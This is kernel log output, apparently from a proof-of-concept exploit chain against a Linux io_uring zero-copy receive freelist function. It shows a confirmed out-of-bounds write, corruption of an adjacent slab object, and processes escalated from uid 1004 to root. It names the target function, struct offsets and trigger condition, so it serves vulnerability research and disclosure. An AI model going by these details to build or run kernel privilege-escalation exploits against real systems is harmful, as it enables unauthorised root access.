=== OOB WRITE CONFIRMED ===
[78491.461849] zcrx_poc: ========================================
[78491.461854] zcrx_poc: io_uring ZCRX freelist OOB PoC
[78491.461854] zcrx_poc: Target: io_zcrx_return_niov_freelist()
[78491.461855] zcrx_poc: ========================================
[78491.487054] zcrx_poc: kallsyms_lookup_name @ ffffffffaa6a8624
[78491.487092] zcrx_poc: io_zcrx_return_niov @ ffffffffaac16890
[78491.487095] zcrx_poc: sizeof(fake_zcrx_area) = 192 (want 192)
[78491.487098] zcrx_poc: sizeof(fake_net_iov)   = 64 (want 64)
[78491.487101] zcrx_poc: offsetof(fake_zcrx_area, freelist_lock) = 64 (want 64)
[78491.487103] zcrx_poc: offsetof(fake_zcrx_area, free_count)    = 68 (want 68)
[78491.487106] zcrx_poc: offsetof(fake_zcrx_area, freelist)      = 72 (want 72)
[78491.487109] zcrx_poc: Setup complete:
[78491.487111] zcrx_poc:   area         @ ffff8d3954cb7900 (size 192)
[78491.487115] zcrx_poc:   area->nia    @ ffff8d3954cb7900
[78491.487117] zcrx_poc:   niov         @ ffff8d39580f0600 (pp=0000000000000000)
[78491.487121] zcrx_poc:   freelist     @ ffff8d34296428d0 [0]=0 [1(guard)]=0xdeadbeef
[78491.487126] zcrx_poc:   free_count   = 1 (== num_niovs=1 → freelist FULL)
[78491.487129] zcrx_poc:
[78491.487130] zcrx_poc: *** Calling io_zcrx_return_niov(niov) with pp=NULL ***
[78491.487133] zcrx_poc:     Expected path: io_zcrx_return_niov_freelist(niov)
[78491.487135] zcrx_poc:     Will execute: freelist[free_count++] = niov_idx
[78491.487136] zcrx_poc:     free_count=1 == num_niovs=1 → write at freelist[1] → OOB!
[78491.487139] zcrx_poc:
[78491.487141] zcrx_poc: Post-call state:
[78491.487143] zcrx_poc:   free_count    = 2 (was 1, now 2)
[78491.487145] zcrx_poc:   freelist[0]   = 0
[78491.487148] zcrx_poc:   freelist[1]   = 0x00000000 (canary was 0xdeadbeef)
[78491.487151] zcrx_poc: *** OOB WRITE CONFIRMED ***
[78491.487157] zcrx_poc:     freelist[1] overwritten: 0xdeadbeef → 0x00000000
[78491.487162] zcrx_poc:     io_zcrx_return_niov_freelist() has NO bounds check!
[78491.487164] zcrx_poc:     free_count=2 overran num_niovs=1

=== ADJACENT SLAB CORRUPTION ===
[78893.619192] zcrx_esc: [✓] STAGE 1 PASS — wrote 0x1337 at OOB offset +4920
[78893.619197] zcrx_esc: ═══ STAGE 2: Adjacent slab object corruption ═══
[78893.619200] zcrx_esc: victim_obj size=64 bytes → kmalloc-64
[78893.619203] zcrx_esc:   victim    @ ffff8d342df4e140
[78893.619205] zcrx_esc:   victim->size BEFORE = 0xaabbccdd
[78893.619208] zcrx_esc:   victim->size AFTER  = 0x00000007
[78893.619209] zcrx_esc: [✓] STAGE 2 PASS — victim->size corrupted: 0xAABBCCDD → 7
[78893.619210] zcrx_esc:     Adjacent kmalloc-64 object OVERWRITTEN
[78893.619666] zcrx_esc: Adjacent corruption: depends on SLUB layout

=== CRED ESCALATION uid=1004→0 ===
[79406.140881] zcrx_weapon: escalating PID 119845  uid=0 → 0
[79461.679764] zcrx_weapon: escalating PID 120112  uid=1004 → 0
[79522.514488] zcrx_weapon: escalating PID 120548  uid=1004 → 0
[79522.514490] zcrx_weapon: new_cred @ ffff8d33c498af00  uid=1004→0 caps=ffffffffffffffff
[79522.514493] zcrx_weapon: *** ESCALATION COMPLETE for PID 120548 ***
[79522.514496] zcrx_weapon:     uid 1004 → 0
[80004.505796] zcrx_weapon: escalating PID 122490  uid=1004 → 0
[80004.505804] zcrx_weapon: new_cred @ ffff8d33db93a180  uid=1004→0 caps=ffffffffffffffff
[80004.505812] zcrx_weapon: *** ESCALATION COMPLETE for PID 122490 ***
[80004.505819] zcrx_weapon:     uid 1004 → 0